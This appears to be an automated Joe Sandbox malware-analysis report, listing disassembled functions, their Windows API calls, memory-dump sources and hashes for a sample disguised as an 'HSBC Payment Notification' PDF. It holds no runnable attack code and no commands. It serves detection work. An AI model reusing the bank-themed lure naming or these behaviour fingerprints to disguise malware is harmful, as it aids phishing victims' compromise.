Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185

Function 009D2F33 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009D2F2E,?,?,00000008,?,?,009D1284,00000000), ref: 009D3160

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 27e9636b9f5e4e62162b71a857695fa66e1ba97e49446bc0f6fd2062644fb115
Instruction ID: 081d8ab6cd4fb74209d65edf51b0803719c8533cec5c0a45ad4b2b82e64341be
Opcode Fuzzy Hash: 27e9636b9f5e4e62162b71a857695fa66e1ba97e49446bc0f6fd2062644fb115
Instruction Fuzzy Hash: C0B16B316506099FD714CF28C48AB657BE0FF45365F29C699E899CF3A1C335EA82CB41

Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F

Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60

Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88

Function 009CBD80 Relevance: .9, Instructions: 853COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689dfffbe793ea6644ff73e77f90c6b299eef0c1fa18d45061cba1b0c9777d16
Instruction ID: 5f7366d130df9277e2cc05c0af55dfc38439deb4242471e6207abbb459411b65
Opcode Fuzzy Hash: 689dfffbe793ea6644ff73e77f90c6b299eef0c1fa18d45061cba1b0c9777d16
Instruction Fuzzy Hash: 82823E76B083108BD748DF18D89075EF3E2ABCC314F1A893DA999E7354DA74EC119B86

Function 00418808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A

Function 009A0B70 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29859a0aa5e3363d189809261a0b3a6fa443fa03cef06ce08d0dfdf37f2a3ce8
Instruction ID: 6bde75105738cf451e1e4c97484d77b00f9daa4e549027233f1d966897eab1d0
Opcode Fuzzy Hash: 29859a0aa5e3363d189809261a0b3a6fa443fa03cef06ce08d0dfdf37f2a3ce8
Instruction Fuzzy Hash: A6B15E22D4D3809FCF75862848555366B9DAAE3328F8FC6D6D0E98B1E3C5399C09C7D2

Function 004221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624

Function 004225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624

Function 009C4F10 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792

Function 00997E70 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b3eafa9795e010a6db8628afc93a7258215fca8be902a0797d391332c73505
Instruction ID: f6ab8c96407a7da6af27ca02f9b85a50d50524330737042684ef4546504a0933
Opcode Fuzzy Hash: f5b3eafa9795e010a6db8628afc93a7258215fca8be902a0797d391332c73505
Instruction Fuzzy Hash: 546112359697A44BC312AF3EE88127AB394FFD6384F44C73EEA8172A90DB34154AD344

Function 00C3ED5C Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac63b656c1a45466358218405d311dcef227f83ae0416c392b21d40ca0da5ed
Instruction ID: e8dd887f122d6076dd016f77c02798ee97ea8caa2fc2e717372fad96666ee35d
Opcode Fuzzy Hash: cac63b656c1a45466358218405d311dcef227f83ae0416c392b21d40ca0da5ed
Instruction Fuzzy Hash: DE514C2754F3E01FC317DA795CA51C9BF625F5B1A472E00EBD0C49B1A3E0A84B9ACB52

Function 009D4766 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd7d16975c4f5b4429908300ec08168526929071af15a868c1fc479e9cca1e6
Instruction ID: c3f061529ddb5cd1c1bb36219555bceb99646e146d489a81682c8342d59bfc01
Opcode Fuzzy Hash: 9cd7d16975c4f5b4429908300ec08168526929071af15a868c1fc479e9cca1e6
Instruction Fuzzy Hash: 2941455664D7C19EE325C53484823E3AFD28F72309F08C95ED8C247B83D27AA55ED362

Function 0053AFF8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction ID: b08835c86323f0c9c84fe90cec2ffb1bebbb351790c6634138aae666159fbeec
Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction Fuzzy Hash: CB311A26A093845EFF3E4969985C7BB7F64FB61371F1C4166E7748B092D3219C44C361

Function 009C2D10 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92

Function 009CCB10 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94

Function 00C425B8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: d59ee8a97f04597c2d77cecb8a0e127fbe8c1cff68c12a7d904ff173696bfaad
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9341A471D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50

Function 00C42448 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: e734eb0afc6a3097f6cbc2db76523ce5df910bc2539ae990d35857c01cc33eae
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 28019D78A10209EFCB48DF98C5919AEF7B5FB88310F608599E819A7705D730AF41DB80

Function 00C424A8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 80a205c75b3f926a56b6e001e62b7bc1638908ea4a7eb4a30d08b24434a86878
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: D1019D78A00209EFCB44DF98C5919AEF7B5FB48310F608699E819A7701D730AF51DB80

Function 00C40DE8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00991130 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048A630
GetSysColorBrush.USER32(0000000F), ref: 0048A661
GetSysColor.USER32(0000000F), ref: 0048A66D
SetBkColor.GDI32(?,000000FF), ref: 0048A687
SelectObject.GDI32(?,00000000), ref: 0048A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
GetSysColor.USER32(00000010), ref: 0048A6C9
CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
FrameRect.USER32(?,?,00000000), ref: 0048A6DF
DeleteObject.GDI32(00000000), ref: 0048A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
FillRect.USER32(?,?,00000000), ref: 0048A763
GetWindowLongW.USER32(?,000000F0), ref: 0048A78E

Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
Opcode Fuzzy Hash: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A

Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00402CA2
DeleteObject.GDI32(00000000), ref: 00402CE8
DeleteObject.GDI32(00000000), ref: 00402CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

SendMessageW.USER32(?,00001053), ref: 0043C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912

Strings

0, xrefs: 0043C731

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99

Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
